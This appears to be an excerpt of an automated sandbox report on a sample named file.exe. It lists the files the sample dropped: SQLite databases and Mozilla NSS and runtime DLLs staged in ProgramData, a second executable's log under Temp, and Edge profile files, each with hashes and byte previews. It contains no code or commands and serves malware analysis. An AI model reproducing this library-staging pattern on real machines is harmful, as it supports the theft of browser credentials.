                                                                                                                                                                                                                                                                                      C:\ProgramData\GHJDBAKEHDHDGCAKKJJECAEHIE

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):98304
                                                                                                                                                                                                                                                                                      Entropy (8bit):0.08235737944063153
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                                                                                                                                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                                                                                                                                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                                                                                                                                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                                                                                                                                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\JKEHIIJJ

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):106496
                                                                                                                                                                                                                                                                                      Entropy (8bit):1.136471148832945
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c1/k4:MnlyfnGtxnfVuSVumEH1s4
                                                                                                                                                                                                                                                                                      MD5:37B1FC046E4B29468721F797A2BB968D
                                                                                                                                                                                                                                                                                      SHA1:50055EF1C50E4C1A7CCF7D00620E95128E4C448B
                                                                                                                                                                                                                                                                                      SHA-256:7BBD5DFC9026E0D477B027B9A2A3F022F2E72FC9B4E05E697461A00677AE8EFD
                                                                                                                                                                                                                                                                                      SHA-512:1D8A0F0AE76E5A1CF131F6D2C5156EA4204449942210EF029D5B018464355DBF94E2D8ABD6A5A9CDFE4271DCD22703BF26ECE8FEE902E122184680F1BB001149
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\freebl3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):685392
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.872871740790978
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:4gPbPpxMofhPNN0+RXBrp3M5pzRN4l2SQ+PEu9tUs/abAQb51FW/IzkOfWPO9UN7:4gPbPp9NNP0BgInfW2WMC4M+hW
                                                                                                                                                                                                                                                                                      MD5:550686C0EE48C386DFCB40199BD076AC
                                                                                                                                                                                                                                                                                      SHA1:EE5134DA4D3EFCB466081FB6197BE5E12A5B22AB
                                                                                                                                                                                                                                                                                      SHA-256:EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
                                                                                                                                                                                                                                                                                      SHA-512:0B7F47AF883B99F9FBDC08020446B58F2F3FA55292FD9BC78FC967DD35BDD8BD549802722DE37668CC89EDE61B20359190EFBFDF026AE2BDC854F4740A54649E
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........4......p.....................................................@A........................H...S...............x............F..P/.......#................................... ..................@............................text............................... ..`.rdata....... ......................@..@.data...<F...0......................@....00cfg..............................@..@.rsrc...x...........................@..@.reloc...#.......$..."..............@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\mozglue.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):608080
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.833616094889818
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
                                                                                                                                                                                                                                                                                      MD5:C8FD9BE83BC728CC04BEFFAFC2907FE9
                                                                                                                                                                                                                                                                                      SHA1:95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
                                                                                                                                                                                                                                                                                      SHA-256:BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
                                                                                                                                                                                                                                                                                      SHA-512:FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\msvcp140.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):450024
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.673992339875127
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
                                                                                                                                                                                                                                                                                      MD5:5FF1FCA37C466D6723EC67BE93B51442
                                                                                                                                                                                                                                                                                      SHA1:34CC4E158092083B13D67D6D2BC9E57B798A303B
                                                                                                                                                                                                                                                                                      SHA-256:5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
                                                                                                                                                                                                                                                                                      SHA-512:4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\nss3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):2046288
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.787733948558952
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
                                                                                                                                                                                                                                                                                      MD5:1CC453CDF74F31E4D913FF9C10ACDDE2
                                                                                                                                                                                                                                                                                      SHA1:6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
                                                                                                                                                                                                                                                                                      SHA-256:AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
                                                                                                                                                                                                                                                                                      SHA-512:DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\softokn3.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):257872
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.727482641240852
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
                                                                                                                                                                                                                                                                                      MD5:4E52D739C324DB8225BD9AB2695F262F
                                                                                                                                                                                                                                                                                      SHA1:71C3DA43DC5A0D2A1941E874A6D015A071783889
                                                                                                                                                                                                                                                                                      SHA-256:74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
                                                                                                                                                                                                                                                                                      SHA-512:2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\ProgramData\vcruntime140.dll

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                                                      File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):80880
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.920480786566406
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
                                                                                                                                                                                                                                                                                      MD5:A37EE36B536409056A86F50E67777DD7
                                                                                                                                                                                                                                                                                      SHA1:1CAFA159292AA736FC595FC04E16325B27CD6750
                                                                                                                                                                                                                                                                                      SHA-256:8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
                                                                                                                                                                                                                                                                                      SHA-512:3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fb696bafb5.exe.log

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\1007638001\fb696bafb5.exe
                                                                                                                                                                                                                                                                                      File Type:CSV text
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):226
                                                                                                                                                                                                                                                                                      Entropy (8bit):5.360398796477698
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:6:Q3La/xw5DLIP12MUAvvR+uTL2ql2ABgTv:Q3La/KDLI4MWuPTAv
                                                                                                                                                                                                                                                                                      MD5:3A8957C6382192B71471BD14359D0B12
                                                                                                                                                                                                                                                                                      SHA1:71B96C965B65A051E7E7D10F61BEBD8CCBB88587
                                                                                                                                                                                                                                                                                      SHA-256:282FBEFDDCFAA0A9DBDEE6E123791FC4B8CB870AE9D450E6394D2ACDA3D8F56D
                                                                                                                                                                                                                                                                                      SHA-512:76C108641F682F785A97017728ED51565C4F74B61B24E190468E3A2843FCC43615C6C8ABE298750AF238D7A44E97C001E3BE427B49900432F905A7CE114AA9AD
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\156ef2b1-2454-4432-a637-d6aae5b50f8e.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):46417
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.086320667862408
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:iMkbJrT8IeQcrQgxKTwUi1zNtAJT9zrD2K3xIAB3lYCionJDSgzMMd6qD47u30/:iMk1rT8HRK1xVhTYFontSmd6qE7V
                                                                                                                                                                                                                                                                                      MD5:A2EDE76E4AE57FEA1BE3DCC239AACCBB
                                                                                                                                                                                                                                                                                      SHA1:E1AAB0F8493F034ADEC4CAFA6FDC3264E7EFC919
                                                                                                                                                                                                                                                                                      SHA-256:DA855021D8FFB397E8E8DB8ADE2A01FF6574FF8CA0E246B0448BB94FD6A15F75
                                                                                                                                                                                                                                                                                      SHA-512:8C0D516B6B385ED09B952A05F44CBF24FFF53F485D0464634814485B45BFE9735A211DB504760105661F1F047543BB72941372420FE81449E6FD6AB0A094FCF4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","apps_count_check_time":"13376570072467642","browser":{"browser_build_version":"117.0.2045.55","browser_version_of_last_seen_whats_new":"117.0.2045.55","last_seen_whats_new_page_version":"117.0.2045.55"},"continuous_migration":{"local_guid":"748e049a-9fe2-49ff-bdbf-e5ed49ffab1c"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"desktop_session_duration_tracker":{"last_session_end_timestamp":"1732096477"},"domain_actions_config":"H4sIAAAAAAAAAL1dWZPktpH+KxP9ZDtU6GMujfykHY9txVpHyHIoYh2ODhBEkWiCAAdHVbEc/u+bCVb1dE8RqEqOdh806mbzw8VEXshM/PuKb27vha2luF9LHqKT96KVoru3G+mcquXVN/++4sOgleBBWeOvvvnn4YGs7wcLz8erb65+HMKPMVx9dVXbnisDT4wMa612TNj+6j9fUSA+xFpZPyH/9dVVQig59Wx4L5+Cwzjg799ubt/jJP48zeE9TuHwDjYBc/Ew+Ktvbv/z1ZWoe+rsjB4/7Abr5U+ajz9LXo9Px+21Mk1hoo/oX6HHjTLyKTjYyMJmCbLnO/hZMpjFAjSvxOIhbxgi5FK85m+ZCkuQu7UyKoxLO97

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\7f953364-4a1d-4d1d-8bdf-490930eb9940.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:modified
                                                                                                                                                                                                                                                                                      Size (bytes):44906
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.095217927286905
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWsRi1zNtAJTNWJGC0QPvcP8ELKJDSgzMMd6qD47u3S:+/Ps+wsI7ynFxhKtSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:9F1411D858AC83349C1FBB2096C0A0A5
                                                                                                                                                                                                                                                                                      SHA1:E76397A13EB3F970FA4081FB765A48A54B2B1235
                                                                                                                                                                                                                                                                                      SHA-256:EBA15C4B679BE659E63880A7F9CCC884E88DB8B2EBA7C2B8CF0D786A25575CE1
                                                                                                                                                                                                                                                                                      SHA-512:C1AD56628161862CFD5CA37D170064654CE699DD92339C0A84BAE4F7E0072A16D25876B782218CBA46ED21A9F685485B0263EA9A9DE5A75F76FAFB05A67A67F9
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\9826bf59-cc5e-498e-b5b1-82b930d7e04a.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                      Entropy (8bit):6.089760054496682
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kW8di1zNtPMnkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynogkzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                      MD5:A9C011CEE03B0F16594FC2003BC38212
                                                                                                                                                                                                                                                                                      SHA1:C67FBB984FE23B4DD865499EE1BBBFD74F691B5C
                                                                                                                                                                                                                                                                                      SHA-256:B600D612543AAFA9C256BFB8A8944D26A9F19433F62B28309C4FD73410E3E39E
                                                                                                                                                                                                                                                                                      SHA-512:02EA2B071E84B42CF38405B9D1F93C6326BB6DB196036A4DC76055BF2E6475C3772DABCAD9A473BF32A0C618495A0863C0393359E6972EF57F7B817D524C9165
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJO

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\blocklist (copy)

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                      MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                      SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                      SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                      SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
                                                                                                                                                                                                                                                                                      Preview:{"sites":[{"url":"24video.be"},{"url":"7dnifutbol.bg"},{"url":"6tv.dk"},{"url":"9kefa.com"},{"url":"aculpaedoslb.blogspot.pt"},{"url":"aek-live.gr"},{"url":"arcadepunk.co.uk"},{"url":"acidimg.cc"},{"url":"aazah.com"},{"url":"allehensbeverwijk.nl"},{"url":"amateurgonewild.org"},{"url":"aindasoudotempo.blogspot.com"},{"url":"anorthosis365.com"},{"url":"autoreview.bg"},{"url":"alivefoot.us"},{"url":"arbitro10.com"},{"url":"allhard.org"},{"url":"babesnude.info"},{"url":"aysel.today"},{"url":"animepornx.com"},{"url":"bahisideal20.com"},{"url":"analyseindustrie.nl"},{"url":"bahis10line.org"},{"url":"apoel365.net"},{"url":"bahissitelerisikayetleri.com"},{"url":"bambusratte.com"},{"url":"banzaj.pl"},{"url":"barlevegas.com"},{"url":"baston.info"},{"url":"atomcurve.com"},{"url":"atascadocherba.com"},{"url":"astrologer.gr"},{"url":"adultpicz.com"},{"url":"alleporno.com"},{"url":"beaver-tube.com"},{"url":"beachbabes.info"},{"url":"bearworldmagazine.com"},{"url":"bebegimdensonra.com"},{"url":"autoy

                                                                                                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Ad Blocking\cd0a0d66-faab-456d-96bb-889d83b4ee6e.tmp

                                                                                                                                                                                                                                                                                      Download File
                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                      Size (bytes):107893
                                                                                                                                                                                                                                                                                      Entropy (8bit):4.64013246649014
                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                      SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P78:fwUQC5VwBIiElEd2K57P78
                                                                                                                                                                                                                                                                                      MD5:10101225085294C4AA9050CEF19E599D
                                                                                                                                                                                                                                                                                      SHA1:D1E683B46B7E0B1C4DE538392F7ACB4DF6280404
                                                                                                                                                                                                                                                                                      SHA-256:6F703C25109774C2D844787790FFA45183787FBFA140A5AEAD247638E0987C21
                                                                                                                                                                                                                                                                                      SHA-512:A8C5867A96AD36813905AD2C01D5C18CBB82D3F1F91DFCE64E48D60EED226F1F16DBD5F3B8FC9DF065D0C641A3245EC6E59556EE4B2C219852B0C43584D334F4
                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                      Reputation:unknown
